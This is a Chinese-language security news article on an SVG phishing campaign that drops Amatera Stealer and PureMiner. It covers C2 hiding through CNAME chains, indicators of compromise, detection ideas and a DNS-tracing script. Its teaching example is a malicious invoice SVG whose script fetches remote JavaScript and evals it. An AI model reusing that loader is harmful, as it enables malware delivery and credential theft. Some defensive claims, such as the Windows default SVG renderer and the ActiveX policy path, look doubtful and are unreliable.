一、一封“发票图”,竟成远程控制入口?
2025年秋,欧洲多家中小企业财务人员陆续收到一封看似普通的邮件:“附件为贵司最新账单,请查收。”随信附带一个名为 invoice_OCT2025.svg 的文件。用户双击打开后,屏幕上只显示一张简洁的矢量发票图——毫无异常。
然而,就在图像加载完成的瞬间,后台已悄然执行一段嵌入式JavaScript代码,从境外服务器下载名为 Amatera Stealer 的恶意程序。数分钟后,受害者的浏览器Cookie、加密钱包私钥、企业凭证被批量上传;与此同时,另一模块 PureMiner 开始在后台调用CPU资源,为攻击者挖掘门罗币(Monero)。
这并非科幻桥段,而是FortiGuard Labs与WhoisXML API联合披露的一起真实攻击事件。根据CircleID于2025年10月30日发布的深度分析报告,攻击者正大规模利用 SVG(可缩放矢量图形)文件作为初始投递载体,绕过传统邮件网关对“图片”的信任假设,实现高隐蔽性入侵。
更令人警惕的是,整个攻击基础设施通过多层DNS别名链、公共云CDN伪装和快变域名(Fast-Flux)技术隐藏真实C2(命令与控制)服务器,使得基于IP或域名的静态封堵几乎失效。
“我们过去总说‘不要点.exe’,但现在连.svg都可能执行代码。”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报采访时直言,“攻击者正在把‘无害格式’变成武器,而我们的防御体系还没跟上。”
二、SVG为何能“执行代码”?技术原理深度解析
要理解此次攻击的颠覆性,必须先厘清SVG的本质。
SVG(Scalable Vector Graphics)是一种基于XML的矢量图像格式,广泛用于网页图标、数据可视化和响应式设计。但与PNG、JPEG等纯栅格图像不同,SVG支持内嵌JavaScript、CSS甚至外部资源引用。这意味着,一个“.svg”文件本质上是一个可执行的微型网页。
攻击载荷构造示例:
以下是一个简化版的恶意SVG文件结构(仅用于教学演示):
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="500" height="300">
<title>Invoice OCT2025</title>
<rect x="10" y="10" width="480" height="280" fill="#f0f0f0"/>
<text x="50" y="50" font-size="18">Invoice #INV-202510</text>
<!-- 恶意脚本隐藏在看似无害的标签中 -->
<script type="application/ecmascript"><![CDATA[
(function() {
// 动态构建下载URL
const domain = "ms-team-ping2[.]com";
const payload = "/loader.bin";
// 创建隐藏iframe触发下载
const iframe = document.createElement('iframe');
iframe.style.display = 'none';
iframe.src = "https://" + domain + payload;
document.body.appendChild(iframe);
// 或通过fetch下载并执行
fetch("https://" + domain + "/stage2.js")
.then(r => r.text())
.then(eval); // 危险!但有效
})();
]]></script>
</svg>
当用户在浏览器或支持脚本渲染的SVG查看器中打开此文件时,内嵌的JavaScript会立即执行,从远程服务器拉取第二阶段载荷(如Amatera Stealer)。
注:Windows默认使用Internet Explorer引擎渲染本地SVG文件,若未禁用ActiveX或脚本执行,极易中招。
为何能绕过传统防御?
扩展名欺骗:邮件网关通常将.svg归类为“安全图像”,不进行沙箱 detonation;
MIME类型混淆:即使服务器返回Content-Type: image/svg+xml,多数安全设备不会解析其内部脚本;
无文件落地:部分攻击采用内存加载(in-memory execution),避免写入磁盘,规避EDR检测。
三、攻击链条全景:从SVG到窃密与挖矿
根据CircleID报告及FortiGuard Labs的IoC(Indicators of Compromise)分析,此次攻击分为三个阶段:
阶段一:初始投递(Initial Delivery)
攻击者通过钓鱼邮件发送SVG附件,主题多为“发票”“合同”“物流通知”;
文件名刻意模仿业务场景(如 shipping_notice_7891.svg);
部分变种将SVG托管于GitHub Gist、Pastebin或Google Drive,通过短链接诱导点击。
阶段二:载荷下载与执行(Payload Execution)
SVG内嵌脚本连接至第一跳C2域名(如 ms-team-ping2[.]com);
下载轻量级下载器(Downloader),负责获取主载荷;
主载荷包括:
Amatera Stealer:专用于窃取浏览器Cookie、保存的密码、加密货币钱包(如MetaMask)、Discord令牌等;
PureMiner:基于XMRig的定制挖矿程序,具备进程隐藏、CPU占用动态调节、反调试功能。
阶段三:C2通信与持久化(C2 & Persistence)
C2基础设施采用多层DNS伪装:
域名注册于NiceNIC、Web Commerce等宽松注册商;
使用CNAME链指向Cloudflare、Amazon CloudFront等公共CDN;
真实服务器IP隐藏在CDN背后,难以溯源。
DNS查询数据显示,部分域名在被标记为恶意前 14–105天 已出现在威胁情报Feed中,表明攻击者提前“养域”以提升信誉。
例如,域名 ms-team-ping2[.]com 的DNS解析链如下:
ms-team-ping2.com
→ CNAME → cdn-assets[.]cloudflaressl.com
→ A → 104.21.63.189 (Cloudflare边缘节点)
→ 实际回源至 109.176.207.110(荷兰Nasstar托管)
这种架构使得基于IP的封堵无效,而基于域名的封堵又因快变策略(每日轮换子域)而滞后。
四、国内启示:中国企业的“图片信任”同样危险
尽管此次攻击主要针对欧美目标,但其手法对中国市场极具警示意义。
首先,国内企业普遍依赖邮件处理发票、合同、物流单据。财务、采购、行政人员每日接收大量附件,对“.svg”虽不常见,但对“.html”“.htm”甚至“.url”快捷方式的警惕性仍不足。一旦攻击者将SVG替换为类似格式,风险极高。
其次,国内大量中小企业使用老旧Windows系统(如Win7/Win10未打补丁),默认SVG查看器仍启用脚本执行。2025年已有安全厂商捕获到仿冒“税务通知.svg”的样本,试图下载远控木马。
芦笛指出:“中国用户对‘官方文件’的信任度极高,尤其来自‘税务局’‘银行’‘物流公司’的通知。攻击者只需稍作本地化,就能复刻这套攻击链。”
更值得警惕的是,PureMiner类挖矿程序在国内云服务器环境中尤为猖獗。攻击者常通过弱口令爆破或未修复漏洞入侵云主机,部署挖矿脚本。若结合SVG钓鱼作为初始入口,可形成“端点→服务器”的横向移动链条。
五、防御升级:从“信任图片”到“隔离执行”
面对SVG钓鱼的新威胁,专家建议采取多层次防御策略:
1. 邮件与代理侧:主动剥离与渲染隔离
强制将SVG转为静态PNG:在邮件网关或安全邮件平台(如Mimecast、Proofpoint)中配置策略,对所有SVG附件进行无脚本渲染,并转换为不可执行的栅格图像;
启用浏览器隔离(Browser Isolation):对所有来自邮件、聊天工具的SVG链接,在远程沙箱中打开,本地仅接收像素流;
MIME类型严格校验:拒绝image/svg+xml类型的直接下载,或强制以文本方式呈现。
2. 终端侧:禁用SVG脚本执行
在Windows组策略中禁用SVG的Active Scripting:
计算机配置 → 管理模板 → Windows组件 → Internet Explorer → 安全功能 → 限制ActiveX安装 → 启用
推广使用无脚本SVG查看器(如Inkscape、专用PDF转换工具);
对普通用户,建议将.svg文件关联至记事本,避免双击执行。
3. DNS层:启发式检测与被动追踪
部署支持DNS流量分析的安全平台(如Cisco Umbrella、Palo Alto DNS Security),识别以下异常:
高熵子域(如 x7k9q2.ms-team-ping2.com);
多层CNAME链指向公共CDN;
域名生命周期极短(注册<7天即活跃)。
利用被动DNS(Passive DNS) 数据库(如WhoisXML API、SecurityTrails)追踪域名历史解析记录,发现潜在C2基础设施。
例如,通过Python脚本查询可疑域名的CNAME链:
import dns.resolver
def trace_cname_chain(domain):
chain = []
current = domain
while True:
try:
answers = dns.resolver.resolve(current, 'CNAME')
cname = str(answers[0].target).rstrip('.')
chain.append(cname)
if cname == current: # 避免循环
break
current = cname
except dns.resolver.NoAnswer:
break
except Exception as e:
print(f"Error resolving {current}: {e}")
break
return chain
# 示例:追踪 ms-team-ping2.com
print(trace_cname_chain("ms-team-ping2.com"))
# 输出:['cdn-assets.cloudflaressl.com']
4. 终端检测:行为监控与内存扫描
部署支持无文件攻击检测的EDR(如CrowdStrike、SentinelOne),监控以下行为:
非浏览器进程加载JavaScript引擎(如jscript.dll);
svchost.exe或dllhost.exe发起异常外联;
内存中出现XMRig特征字符串(如“moneropool.com”)。
对Amatera Stealer,重点监控对 %LocalAppData%\Google\Chrome\User Data 等路径的非常规访问。
六、结语:安全不能止步于“看起来无害”
SVG钓鱼的兴起,标志着攻击者正系统性地利用格式信任与防御盲区。他们不再需要复杂的漏洞利用,只需一个被误认为“安全”的文件扩展名,就能打开通往企业核心资产的大门。
这不仅是技术挑战,更是安全思维的转型契机。正如芦笛所言:“未来的安全,不是判断‘它是不是病毒’,而是问‘它为什么需要执行代码?’”
在万物皆可脚本化的时代,我们必须重新定义“可信内容”。每一次双击,都应是一次有意识的安全决策——因为最危险的攻击,往往披着最无害的外衣。
编辑:芦笛(公共互联网反网络钓鱼工作组)
